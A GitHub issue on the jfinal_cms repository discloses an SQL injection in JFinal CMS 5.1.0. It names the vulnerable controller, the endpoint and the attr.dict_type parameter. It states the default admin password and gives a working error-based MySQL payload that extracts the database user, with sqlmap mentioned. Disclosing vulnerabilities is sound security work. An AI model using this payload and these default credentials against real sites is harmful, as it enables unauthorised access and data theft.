jflyfox / jfinal_cms

jfinal cms是一个java开发的功能强大的信息咨询网站,采用了简洁强大的JFinal作为web框架,模板引擎用的是beetl,数据库用mysql,前端bootstrap框架。支持oauth2认证、帐号注册、密码加密、评论及回复,消息提示,网站访问量统计,文章评论数和浏览量统计,回复管理,支持权限管理。后台模块包含:栏目管理,栏目公告,栏目滚动图片,文章管理,回复管理,意见反馈,我的相册,相册管理,图片管理,专辑管理、视频管理、缓存更新,友情链接,访问统计,联系人管理,模板管理,组织机构管理,用户管理,角色管理,菜单管理,数据字典管理。
http://mtg.jflyfox.com/
Apache License 2.0
628 stars 285 forks source link

SQL injection vulnerability exists in JFinal CMS 5.1.0 #38

Open arongmh opened 2 years ago

arongmh commented 2 years ago

Vulnerability Analysis

The vulnerability appears in lines 23-28 of the com.jflyfox.system.dict.DictController.java

image-20220610104610536 image-20220610104555090

The attrVal parameter is the attr.dict_type parameter passed from the front end So you can construct payload to exploit this vulnerability

Exploit

Maven Startup Environment Vulnerability address: /jfinal_cms/system/dict/list Administrator login is required. The default account password is admin:admin123

image-20220610103807418

Injection parameters: attr.dict_type

payload:' OR (SELECT 2896 FROM(SELECT COUNT(*),CONCAT(0x717a7a6271efbd9e,(SELECT (ELT(2896=2896,user()))),0xefbd9e7162707a7131,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--+

image-20220610103651342

Sqlmap:

image-20220610103719657